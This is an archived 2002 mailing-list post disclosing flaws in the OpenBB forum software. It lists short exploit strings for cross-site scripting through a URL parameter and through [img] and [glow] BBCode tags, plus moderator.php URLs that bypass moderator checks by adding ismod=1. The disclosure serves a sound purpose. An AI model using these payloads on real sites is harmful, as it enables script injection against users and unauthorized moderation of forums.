Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Security holes in OpenBB

From: frog frog <leseulfrog () hotmail com>
Date: 23 May 2002 19:31:05 -0000


Product :
OpenBB
http://www.prolixmedia.com

Versions :
1.0.0 RC3 (and less ?)

Problems :
- XSS
- Access to moderators' options

Exploits :
- /myhome.php?action=messages&box=<*form%20name=a><input%
20name=i%20value=XSS></*form><*script>alert
(document.a.i.value)</*script>

- [img]http://"; onerror="[SCRIPT]"[/img]

- [glow tcolor=')" onmouseover="[SCRIPT]" nothing="('hop, 
fcolor=red, size=100]HUHUHU[/glow]

- moderator.php?action=lock&TID=FORUMID&ismod=1
moderator.php?action=lock&TID=FORUMID&ismod=1&status=1

- etc ...

More details in french :
http://www.ifrance.com/kitetoua/tuto/OpenBB.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%
2Fwww.ifrance.com%2Fkitetoua%2Ftuto%
2FOpenBB.txt&langpair=fr%7Cen&hl=fr&ie=UTF8&oe=UTF8&prev=%
2Flanguage_tools

frog-m@n
Previous By Date Next
Previous By Thread Next

Current thread: